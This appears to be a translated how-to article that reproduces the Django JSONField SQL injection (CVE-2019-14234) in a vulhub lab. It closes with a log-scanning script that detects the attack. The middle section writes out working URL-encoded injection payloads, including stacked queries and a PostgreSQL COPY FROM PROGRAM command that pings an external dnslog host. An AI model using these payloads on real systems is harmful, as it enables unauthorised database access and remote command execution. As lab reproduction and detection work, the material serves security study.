2025-01-22 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
What is the Django JSONField SQL injection vulnerability CVE-2019-14234, and how is it reproduced? Many newcomers are not clear on this, so the following walks through it in detail for anyone who needs it; I hope you gain something from it.
Django is an open source web application framework written in Python. It uses the MTV pattern: model (M), view (V) and template (T). It was originally developed as CMS software to manage news-content websites owned by the Lawrence Publishing Group, and was released under the BSD license in July 2005.
Exploiting the vulnerability requires that developers use JSONField/HStoreField and that a user can control the key name used in a queryset lookup; the SQL is injected at the position of that key name. Django is usually paired with a PostgreSQL database, and JSONField is a data type specific to that database. The root cause lies in the implementation of the JSONField class in Django: the essential job of Django's model layer is to generate SQL statements, and when Django generated SQL for JSONField key lookups it did so by simple string concatenation.
Affected versions:
Django main development branch
Django 2.2.x < 2.2.4
Django 2.1.x < 2.1.11
Django 1.11.x < 1.11.23
This is recorded only for vulnerability reproduction and practice. The exploitation process is as follows:
I. Vulnerable environment
This environment is built using vulhub.
Execute the following commands to complete the environment setup:
cd vulhub/django/CVE-2019-14234/
docker-compose up -d
After startup, the message is as follows
Vulnerability link: http://192.168.101.152:8000/
Access as shown below
First visit the admin backend at http://192.168.101.152:8000/admin/login/; the account/password is admin/a123123123.
II. Exploitation process
After logging in to the backend, first visit the management page of the Collection model:
http://192.168.101.152:8000/admin/vuln/collection/
Adding the GET parameter detail__a' triggers an SQL statement error, where detail is the JSONField of the Collection model:
http://192.168.101.152:8000/admin/vuln/collection/?detail__a%27
Construct the statement:
http://192.168.101.152:8000/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Since or 1=1 is always true, all results are returned.
Django is commonly used with PostgreSQL, which allows for an attempt to exploit a PostgreSQL high-privilege command execution vulnerability (CVE-2019-9193).
First visit:
http://192.168.101.152:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
The page shows no results to fetch, which means the statement has been executed.
Then visit:
http://192.168.101.152:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20h7f2ni.dnslog.cn%20%27--%20
to execute the command.
As you can see, the command has been successfully executed.
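The requests above leave a recognisable trace in the web server access log: a query-string parameter name that contains a Django key-transform lookup (field__key) together with quote, parenthesis or semicolon characters. The following added example (not code from the original article or from the Django project) scans constructed access-log lines for such admin change-list requests; the log lines, client IPs and the combined log format are assumptions, and the real remediation remains upgrading to the fixed versions listed above.

```python
"""Flag access-log requests that carry SQL metacharacters inside a Django
key-transform lookup name (the CVE-2019-14234 pattern).  Constructed example
with made-up log lines; upgrading to 2.2.4 / 2.1.11 / 1.11.23 is the fix."""
import re
from urllib.parse import parse_qsl, urlsplit

# A legitimate key transform is <field>__<key> with an identifier-like key.
# Quotes, parentheses, ';' or '--' in the *parameter name* are what the
# payloads above rely on to break out of the concatenated key string.
META = re.compile(r"""['"();]|--""")
# Request line inside a combined-format (nginx/Apache) access log entry.
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_lookups(target):
    """Return decoded parameter names that look like injected key lookups."""
    hits = []
    # keep_blank_values keeps a bare 'name' with no '=', the shape used above
    for name, _value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if "__" in name and META.search(name):
            hits.append(name)
    return hits


def scan_log(lines):
    """Return (client_ip, target, hits) for admin requests carrying injected lookups."""
    findings = []
    for line in lines:
        m = REQ.search(line)
        if not m or "/admin/" not in m.group("target"):
            continue
        hits = suspicious_lookups(m.group("target"))
        if hits:
            findings.append((line.split(" ", 1)[0], m.group("target"), hits))
    return findings


# Constructed sample: two probes from the walkthrough, one benign admin filter,
# one static file request.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2020:10:00:01 +0000] "GET /admin/vuln/collection/?detail__a%27 HTTP/1.1" 500 1234',
    '10.0.0.5 - - [31/May/2020:10:00:02 +0000] "GET /admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20-- HTTP/1.1" 200 5678',
    '10.0.0.7 - - [31/May/2020:10:00:03 +0000] "GET /admin/vuln/collection/?detail__a__exact=foo HTTP/1.1" 200 3000',
    '10.0.0.8 - - [31/May/2020:10:00:04 +0000] "GET /static/admin/css/base.css HTTP/1.1" 200 999',
]

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {target}: {hits}")
```

A normal admin filter such as detail__a__exact=foo is not flagged, because only the decoded parameter name is checked for metacharacters.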